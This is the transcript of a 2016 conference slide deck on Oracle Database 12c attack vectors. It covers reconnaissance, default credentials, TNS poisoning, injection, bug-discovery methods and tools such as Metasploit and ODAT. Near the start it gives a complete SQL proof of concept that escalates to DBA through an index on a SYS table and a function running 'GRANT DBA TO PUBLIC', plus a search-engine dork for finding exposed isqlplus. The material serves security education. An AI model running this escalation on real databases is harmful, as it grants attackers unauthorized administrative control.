Oracle database 12c attack vectors Martin Toshev, BGOUG, 04.06.2016
Welcome message from author
This document is posted to help you gain knowledge. Please leave a comment to let me know what you think about it! Share it to your friends and learn new things together.
Transcript
Oracle database 12c attack vectors
Martin Toshev,BGOUG, 04.06.2016
Who am I
Software consultant (CoffeeCupConsulting)
BG JUG board member (http://jug.bg)
OpenJDK and Oracle RDBMS enthusiast
Who am IAuthor of Learning RabbitMQ
Agenda
• Real world examples
• Attack vectors
• Attack discovery approach
• Tools
Real world examples
Real world examples
source: http://tech.firstpost.com/news-analysis/oracles-database-secure-even-nsa-cant-hack-us-say-larry-ellison-217341.html, 30 Jan, 2014
Real world examples
However …
Real world examples
Source: http://www.cnet.com/news/oracle-databases-easy-to-hack-says-researcher/
"Disable the protocol in Version 11.1 and start using older versions like Version 10g," which is not vulnerable”
they didn't fix the current version, which leaves 11.1 and 11.2 still susceptible to attacks
Real world examples
Source: http://www.joxeankoret.com/download/tnspoison.pdf/
Real world examples
Source: http://www.itsec.gov.cn/webportal/download/2005_Search_Engine_Attack_Database.pdf
Simple example:1) https://www.google.ca/advanced_search2) search for ‘/isqlplus’ and specify 'URL only'3) voila
Real world examples
Source: http://thehackernews.com/2014/08/Vulnerability-Oracle-Data-Redaction-Security.html
Real world examples
Source: http://www.reuters.com/article/us-oracle-hackers-idUSTRE56L66D20090722 http://www.theinquirer.net/inquirer/news/1469225/oracle-databases-hacked-script-kiddies
Real world examples
Source: http://www.dba-oracle.com/t_hackers_breaches_horror_stories.htm
Real world examples
Source: http://www.davidlitchfield.com/Privilege_Escalation_via_Oracle_Indexes.pdf
Real world examples
• Privelege escalation via indexes in 12c:-- from SYS: create c##autoexec user
CREATE USER c##autoexec IDENTIFIED BY 123;GRANT CREATE SESSION TO c##autoexec;GRANT CREATE PROCEDURE TO c##autoexec;ALTER USER C##autoexec QUOTA 100M ON USERS;
CREATE TABLE foo ( Id int);INSERT INTO sys.foo values (100);INSERT INTO sys.foo values (50);
GRANT INDEX ON foo to c##autoexec;GRANT SELECT, INSERT ON foo TO c##autoexec;
Real world examples
• Privelege escalation via indexes in 12c:
-- from c##autoexec: attempt to set the DBA role - FAILSSET ROLE DBA;
Real world examples
• Privelege escalation via indexes in 12c:
-- from c##autoexecCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHIDCURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION;BEGINEXECUTE IMMEDIATE 'GRANT DBA TO PUBLIC';COMMIT;RETURN 'FOO';END;
Real world examples
• Privelege escalation via indexes in 12c:
-- from c##autoexecGRANT EXECUTE ON GETDBA TO public;
CREATE INDEX EXPLOIT_INDEX ON SYS.FOO(C##AUTOEXEC.GETDBA(''));
-- from SYSDBASELECT * FROM sys.foo;
-- from c##autoexec: SUCCESSSET ROLE DBA;
Attack vectors
Attack vectors
• Let’s have a look at the high level architecture of the database …
Attack vectorsunauthorized authorized
(limited permissions)authorized(SYSDBA)
OSlevel
Attack vectors
• Attack vectors can originate from different sources depending on the setup (we will abstract ourselves from this criteria):
– external (applications running publicly, vulnerable protocols running on the database servers, malware enabling machine access)
– internal (employees with non-dba access, DBAs, OS-level users)
Attack vectors
• Attacks from unauthorized users:
– reconnaissance:
• looking for application servers and database tools running on the database publicly
• using search engines to find Oracle directory indices, web apps (such as isqlplus) running publicly
• port scanning for well known ports (such as 1521 for the TNS listener) on target machines
Attack vectors
• Attacks from unauthorized users:
– gaining access:
• exploring misconfiguration - using default credentials
• exploring lack of identity policy – password brute forcing
• exploring security bugs (e.g. buffer overflow enabling arbitrary command execution on the TNS listener)
Attack vectors
• Attacks from unauthorized users:
– data theft:
• exploring lack of encryption leading to man-in-the-middle attacks (e.g. TNS listener poisoning or eavesdropping)
– DoS/DDoS attacks:
• network level DoS (e.g. excessive packets)• buffer overflow DoS (e.g. bug in the TNS listener)
Attack vectors
• Attacks from authorized users with limited permissions:
– SQL injection (typically caused by buggy applications having a DB user with excessive privileges)
– DoS attacks (e.g. due to misconfiguration – excessive connections, filling shared tablespaces, running complex queries)
Attack vectors
• Attacks from authorized users with limited permissions:
– privilege escalation (e.g. via the INDEX permission)
– data theft (e.g. via PL/SQL procedure injection, scheduling opening of remote socket connections to external sources)
Attack vectors
• SYSDBA access … the world is yours
• OS level access – many methods to retrieve passwords and useful data from raw Oracle database files
Attack discovery approach
Attack discovery approach
• Already uncovered security bugs as the ones we discussed are fixed and released by Oracle as critical patch updates
• But how to uncover new bugs and ethically report them before being discovered by attackers ?
Attack discovery approach
• Explore new features (e.g. multitenancy)
• See what parts of the security architecture of the database are in use by these features
• Explore changes to the security architecture and new security features
Attack discovery approach
• For top 12c new features (at a glance):
– consolidation (pluggable databases)
– redaction policy
Attack discovery approach
• For top 12c new features (at a glance):
– consolidation (pluggable databases) – resource utilization of PDBs, access boundary between PDBs, secure data replication between PDBs, discrepancies in local/common users/roles ?
– redaction policy – other built-in functions/mechanisms that can reveal redacted data ? (we already saw some)
Attack discovery approach
• For top 12c new features (at a glance):
– In Line PL/SQL Functions in SQL queries
– Online Migration of Table Partition or Sub Partition
Attack discovery approach
• For top 12c new features (at a glance):
– In Line PL/SQL Functions in SQL queries – bypassing security mechanism, privilege escalation ?
– Online Migration of Table Partition or Sub Partition – data theft ?
Attack discovery approach
• For top 12c new features (at a glance):
– Full Database Caching
– SQL translation framework
Attack discovery approach
• For top 12c new features (at a glance):
– Full Database Caching – buffer overflows, DoS, malicious in-memory data manipulation ?
– SQL translation framework – malicious third-party translation plug-ins, security bugs in translation plug-ins ?
Attack discovery approach
explore existing attacks and security bugs (e.g. use packet crafting tools to try buffer overflow attacks over enhancements of database protocols)
explore vulnerability databases such as CVE for exploits and try to adapt some of them to new database features
Attack discovery approach
make use of proper penetration testing tool such as Metasploit to adapt existing attacks for 10g/11g or older versions to 12c
analyze new PL/SQL packages for security leaks
disassemble Oracle binaries
Attack discovery approach
• You may, of course, discover issues not introduced in 12c but rather propagating through multiple versions (such as the TNS poison vulnerability) …
Tools
Tools
• nmap• Metasploit• Tnscmd• ODAT (Oracle Database Attacking Tool)• w32dasm/ IDA Freeware• Kali Linux
Tools
• ODAT supports 12.1.0.2.0:
– try to find valid SIDs and credentials
– try to escalate valid account to DBA or SYSDBA
– try to execute OS commands from a valid account
Some readings that may bring ideas …
Some readings that may bring ideas …
Thank you !
Q&A
ReferencesOracle 12c Security whitepaperhttp://www.oracle.com/technetwork/database/security/security-compliance-wp-12c-1896112.pdf
Oracle Database 12c architecture overviewhttps://www.youtube.com/watch?v=266ay9N6kAw
Oracle Database 12c New security Featureshttp://www.trivadis.com/sites/default/files/downloads/soe_oracle_database_12_new_security_features_summary.pdf
ReferencesOracle Database 12c securityhttp://docs.oracle.com/database/121/nav/portal_25.htm
Oracle database security checklisthttp://www.isaca.org/groups/professional-english/oracle-database/groupdocuments/twp-security-checklist-database-1-132870.pdf
Encryption and Redaction in Oracle Database12c with Oracle Advanced Securityhttp://www.oracle.com/technetwork/database/options/advanced-security/advanced-security-wp-12c-1896139.pdf
ReferencesPrivelege escalation via Oracle indexeshttp://www.davidlitchfield.com/Privilege_Escalation_via_Oracle_Indexes.pdf
Attacking Oracle with the Metasploit Frameworkhttp://www.blackhat.com/presentations/bh-usa-09/GATES/BHUSA09-Gates-OracleMetasploit-SLIDES.pdf
Oracle Database TNS Listener Poison Attackhttp://www.joxeankoret.com/download/tnspoison.pdf
ReferencesODAT (Oracle Database Attacking Tool) toolhttps://github.com/quentinhardy/odat
Oracle Database 12c CVE vulnerabilities statisticshttps://www.cvedetails.com/product/467/Oracle-Database-Server.html?vendor_id=93
Oracle Database 12c CVE vulnerabilitieshttps://www.cvedetails.com/vulnerability-list/vendor_id-93/product_id-467/cvssscoremin-5/cvssscoremax-5.99/Oracle-Database-Server.html
Related Documents
